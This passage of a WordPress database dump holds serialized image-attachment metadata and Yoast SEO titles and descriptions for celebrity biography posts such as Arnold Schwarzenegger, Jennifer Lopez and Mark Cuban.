g\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:26:\"Giorgio-Armani-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:26:\"Giorgio-Armani-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:26:\"Giorgio-Armani-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:26:\"Giorgio-Armani-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:26:\"Giorgio-Armani-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:26:\"Giorgio-Armani-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:26:\"Giorgio-Armani-534x427.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:26:\"Giorgio-Armani-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:26:\"Giorgio-Armani-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(757,149,'_wp_attachment_image_alt','Giorgio Armani'),(758,148,'_thumbnail_id','149'),(759,148,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(760,148,'slide_template','default'),(761,148,'_yoast_wpseo_focuskw','Giorgio Armani'),(762,148,'_yoast_wpseo_title','Giorgio Armani'),(763,148,'_yoast_wpseo_metadesc','Giorgio Armany\'s bio.'),(764,148,'_yoast_wpseo_linkdex','77'),(765,148,'post_views_count','251'),(766,150,'_edit_lock','1444847380:6'),(767,150,'_edit_last','6'),(772,150,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(773,150,'slide_template',''),(774,150,'_yoast_wpseo_focuskw','Matthew Fox'),(775,150,'_yoast_wpseo_title','Matthew Fox'),(776,150,'_yoast_wpseo_metadesc','Matthew Fox has such an interesting life. Click and read all about it!'),(777,150,'_yoast_wpseo_linkdex','79'),(778,150,'post_views_count','267'),(779,152,'_edit_lock','1444416117:6'),(780,152,'_edit_last','6'),(781,152,'_oembed_26431d6a8318434882e1514e9e06c6c7','{{unknown}}'),(782,152,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(783,152,'slide_template',''),(784,152,'_yoast_wpseo_focuskw','Arnold Schwarzenegger'),(785,152,'_yoast_wpseo_title','Arnold Schwarzenegger'),(786,152,'_yoast_wpseo_metadesc','Arnold Schwarzenegger is a well-known actor who rose from a young body builder to become a great Hollywood figure and governor. Here’s his story, and career accomplishments.'),(787,152,'_yoast_wpseo_linkdex','83'),(788,152,'post_views_count','272'),(789,153,'_edit_lock','1444848210:6'),(790,153,'_edit_last','6'),(791,154,'_wp_attached_file','2015/07/Carlos-Santana.jpg'),(792,154,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:418;s:4:\"file\";s:26:\"2015/07/Carlos-Santana.jpg\";s:5:\"sizes\";a:14:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Carlos-Santana-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Carlos-Santana-300x196.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:24:\"Carlos-Santana-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:25:\"Carlos-Santana-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:26:\"Carlos-Santana-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:26:\"Carlos-Santana-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:26:\"Carlos-Santana-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:26:\"Carlos-Santana-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:26:\"Carlos-Santana-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:26:\"Carlos-Santana-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:26:\"Carlos-Santana-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:26:\"Carlos-Santana-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:26:\"Carlos-Santana-534x418.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:418;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:26:\"Carlos-Santana-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(793,154,'_wp_attachment_image_alt','Carlos Santana'),(794,153,'_thumbnail_id','154'),(795,153,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(796,153,'slide_template',''),(797,153,'_yoast_wpseo_focuskw','Carlos Santana'),(798,153,'_yoast_wpseo_title','Carlos Santana'),(799,153,'_yoast_wpseo_metadesc','Guitarist Carlos Santana is a legend in Latin-infused rock and jazz music. Learn more about his life, career achievements and current personal life.'),(800,153,'_yoast_wpseo_linkdex','85'),(801,153,'post_views_count','225'),(802,155,'_edit_lock','1444418504:6'),(803,155,'_edit_last','6'),(804,155,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(805,155,'slide_template',''),(806,155,'_yoast_wpseo_focuskw','Daniel Radcliffe'),(807,155,'_yoast_wpseo_title','Daniel Radcliffe'),(808,155,'_yoast_wpseo_metadesc','Daniel Radcliffe is a renowned actor that rose to global stardom thanks to his character in Harry Potter series. Read more about his life, Career accomplishments and current personal life.'),(809,155,'_yoast_wpseo_linkdex','84'),(810,155,'post_views_count','283'),(811,156,'_edit_lock','1444848145:6'),(812,156,'_edit_last','6'),(813,157,'_wp_attached_file','2015/07/David-Hasselhoff.jpg'),(814,157,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:427;s:4:\"file\";s:28:\"2015/07/David-Hasselhoff.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"David-Hasselhoff-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"David-Hasselhoff-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:26:\"David-Hasselhoff-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:27:\"David-Hasselhoff-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:28:\"David-Hasselhoff-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:28:\"David-Hasselhoff-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:28:\"David-Hasselhoff-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:28:\"David-Hasselhoff-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:28:\"David-Hasselhoff-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:28:\"David-Hasselhoff-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:28:\"David-Hasselhoff-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:28:\"David-Hasselhoff-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:28:\"David-Hasselhoff-534x427.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:28:\"David-Hasselhoff-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:28:\"David-Hasselhoff-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(815,157,'_wp_attachment_image_alt','David Hasselhoff'),(816,156,'_thumbnail_id','157'),(817,156,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(818,156,'slide_template',''),(819,156,'_yoast_wpseo_focuskw','David Hasselhoff'),(820,156,'_yoast_wpseo_title','David Hasselhoff'),(821,156,'_yoast_wpseo_metadesc','David Hasselhoff is a well-known TV personality based in the U.S. Learn more about his early life, career accomplishments, current personal life, and where he live.'),(822,156,'_yoast_wpseo_linkdex','83'),(823,156,'post_views_count','252'),(824,158,'_edit_lock','1444418068:6'),(825,158,'_edit_last','6'),(826,159,'_wp_attached_file','2015/07/Dolph-Ziggler.jpg'),(827,159,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:427;s:4:\"file\";s:25:\"2015/07/Dolph-Ziggler.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Dolph-Ziggler-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Dolph-Ziggler-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"Dolph-Ziggler-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"Dolph-Ziggler-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"Dolph-Ziggler-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"Dolph-Ziggler-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"Dolph-Ziggler-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"Dolph-Ziggler-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"Dolph-Ziggler-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"Dolph-Ziggler-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"Dolph-Ziggler-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"Dolph-Ziggler-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"Dolph-Ziggler-534x427.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"Dolph-Ziggler-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"Dolph-Ziggler-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(828,159,'_wp_attachment_image_alt','Dolph Ziggler'),(829,158,'_thumbnail_id','159'),(830,158,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(831,158,'slide_template',''),(832,158,'_yoast_wpseo_focuskw','Dolph Ziggler'),(833,158,'_yoast_wpseo_title','Dolph Ziggler'),(834,158,'_yoast_wpseo_metadesc','Known as Nicholas Nameth, Dolph Ziggler is a famous wrestler who began his career in the University. Read more about how he grew up, his career accomplishments, and current personal life.'),(835,158,'_yoast_wpseo_linkdex','83'),(836,158,'post_views_count','355'),(837,160,'_edit_lock','1444847413:6'),(838,160,'_edit_last','6'),(839,160,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(840,160,'slide_template',''),(841,160,'_yoast_wpseo_focuskw','Forest Whitaker'),(842,160,'_yoast_wpseo_title','Forest Whitaker'),(843,160,'_yoast_wpseo_metadesc','Forest Whitaker is a talented actor director and producer. Learn everything about his life, career accomplishments and his personal life.'),(844,160,'_yoast_wpseo_linkdex','85'),(845,161,'_wp_attached_file','2015/07/Forest-Whitaker.jpg'),(846,161,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:427;s:4:\"file\";s:27:\"2015/07/Forest-Whitaker.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Forest-Whitaker-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Forest-Whitaker-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:25:\"Forest-Whitaker-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:26:\"Forest-Whitaker-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:27:\"Forest-Whitaker-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:27:\"Forest-Whitaker-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:27:\"Forest-Whitaker-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:27:\"Forest-Whitaker-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:27:\"Forest-Whitaker-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:27:\"Forest-Whitaker-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:27:\"Forest-Whitaker-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:27:\"Forest-Whitaker-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:27:\"Forest-Whitaker-534x427.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:27:\"Forest-Whitaker-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:27:\"Forest-Whitaker-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(847,161,'_wp_attachment_image_alt','Forest Whitaker'),(848,160,'_thumbnail_id','161'),(849,160,'post_views_count','188'),(850,162,'_edit_lock','1444418488:6'),(851,162,'_edit_last','6'),(852,163,'_wp_attached_file','2015/07/Jennifer-Lopez.jpg'),(853,163,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:359;s:4:\"file\";s:26:\"2015/07/Jennifer-Lopez.jpg\";s:5:\"sizes\";a:13:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Jennifer-Lopez-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Jennifer-Lopez-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:24:\"Jennifer-Lopez-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:25:\"Jennifer-Lopez-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:26:\"Jennifer-Lopez-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:26:\"Jennifer-Lopez-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:26:\"Jennifer-Lopez-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:26:\"Jennifer-Lopez-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:26:\"Jennifer-Lopez-324x359.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:359;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:26:\"Jennifer-Lopez-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:26:\"Jennifer-Lopez-356x359.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:359;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:26:\"Jennifer-Lopez-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:26:\"Jennifer-Lopez-534x359.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:359;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(854,163,'_wp_attachment_image_alt','Jennifer Lopez'),(855,162,'_thumbnail_id','163'),(856,162,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(857,162,'slide_template',''),(858,162,'_yoast_wpseo_focuskw','Jennifer Lopez'),(859,162,'_yoast_wpseo_title','Jennifer Lopez'),(860,162,'_yoast_wpseo_metadesc','Jennifer Lopez is a renowned actor, dancer and singer. Read more about how she grew up, career accomplishments, and current personal life.'),(861,162,'_yoast_wpseo_linkdex','86'),(862,162,'post_views_count','320'),(863,164,'_edit_lock','1444417940:6'),(864,164,'_edit_last','6'),(865,164,'_oembed_f4eae9ab34eeb47e375310e78006e8cd','{{unknown}}'),(866,164,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(867,164,'slide_template',''),(868,164,'_yoast_wpseo_metadesc','Manu Ginobili is one of the greatest players in the history of basketball. Read more about how he grew up, his career achievements, and current personal life.'),(869,164,'post_views_count','362'),(870,165,'_edit_lock','1444415924:6'),(871,165,'_edit_last','6'),(872,166,'_wp_attached_file','2015/07/Mark-Cuban.jpg'),(873,166,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:425;s:4:\"file\";s:22:\"2015/07/Mark-Cuban.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Mark-Cuban-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Mark-Cuban-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:20:\"Mark-Cuban-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:21:\"Mark-Cuban-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:22:\"Mark-Cuban-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:22:\"Mark-Cuban-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:22:\"Mark-Cuban-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:22:\"Mark-Cuban-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:22:\"Mark-Cuban-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:22:\"Mark-Cuban-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s: